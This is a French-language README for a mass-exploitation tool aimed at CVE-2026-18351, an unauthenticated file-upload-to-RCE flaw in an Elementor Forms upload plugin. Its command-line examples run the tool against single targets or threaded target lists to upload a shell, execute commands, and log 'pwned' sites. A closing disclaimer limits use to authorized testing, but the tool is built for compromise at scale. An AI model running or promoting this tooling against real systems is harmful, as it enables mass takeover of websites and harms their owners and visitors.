Outil d'exploitation de masse pour CVE-2026-18351, un téléversement de fichier arbitraire non authentifié menant à une RCE dans Elementor Forms <= 1.6.0, avec sondage passif, téléversement de shell et exécution de commandes.
Outil d'exploitation de masse pour CVE-2026-18351 — Téléversement de fichier arbitraire non authentifié → RCE dans Drag and Drop File Upload for Elementor Forms <= 1.6.0.
crédit johenlastgen | telegram @johenlastgen | chaîne @jlgnetworkredirect
Aucune dépendance externe — utilise uniquement la bibliothèque standard Python.
python3 --version # 3.6+
# Single target — passive check only (no upload)
python3 mass.py --url http://target.com --check
# Single target — exploit with default command (id)
python3 mass.py --url http://target.com --cmd id
# Single target — exploit with custom command
python3 mass.py --url http://target.com --cmd whoami
# Mass targets — passive check
python3 mass.py --list targets.txt --threads 50 --check
# Mass targets — exploit
python3 mass.py --list targets.txt --threads 50 --cmd id
# Mass targets — exploit with timeout tuning
python3 mass.py --list targets.txt --threads 100 --timeout 8 --cmd whoami
# Save full log
python3 mass.py --list targets.txt --output results.txt
# Save only vulnerable targets
python3 mass.py --list targets.txt --output-vuln vuln.txt
# Save only confirmed RCE targets
python3 mass.py --list targets.txt --output-pwned pwned.txt
# Combined output
python3 mass.py \
--list targets.txt \
--threads 50 \
--cmd id \
--output results.txt \
--output-vuln vuln.txt \
--output-pwned pwned.txt
| Option | Description |
|---|---|
--url | URL de la cible unique |
--list FILE | Fichier contenant les URL des cibles (une par ligne) |
--check | Sonde passive uniquement — aucun téléversement de fichier |
--cmd CMD | Commande à exécuter sur le shell (par défaut : id) |
--threads N | Nombre de threads simultanés (par défaut : 20) |
--timeout N | Délai d'expiration par requête en secondes (par défaut : 10) |
--output FILE | Enregistrer le journal complet dans un fichier |
--output-vuln FILE | Enregistrer uniquement les URL des cibles vulnérables dans un fichier |
--output-pwned FILE | Enregistrer uniquement les cibles RCE confirmées dans un fichier |
| État | Signification |
|---|---|
PWNED | Shell téléversé et RCE confirmé |
VULN-NO-EXEC | Téléversement accepté mais exécution du shell échouée |
PATCHED | Téléversement rejeté ou nonce introuvable |
ERROR | Échec réseau ou d'analyse |
Une URL par ligne. Les lignes commençant par # sont ignorées.
http://target1.com
https://target2.com
# this line is ignored
http://target3.com
Ce projet est fourni uniquement pour des évaluations de sécurité autorisées, la recherche en sécurité défensive et la validation de vulnérabilités.
En utilisant ce logiciel, vous confirmez disposer d'une autorisation explicite pour évaluer les systèmes cibles. L'accès non autorisé aux systèmes informatiques est interdit et peut enfreindre les lois applicables.
L'auteur et les contributeurs n'encouragent ni ne cautionnent l'utilisation non autorisée de ce projet et n'assument aucune responsabilité pour tout usage abusif, dommage ou conséquence juridique résultant de son utilisation.
JohenLastGen — JLG NETWORK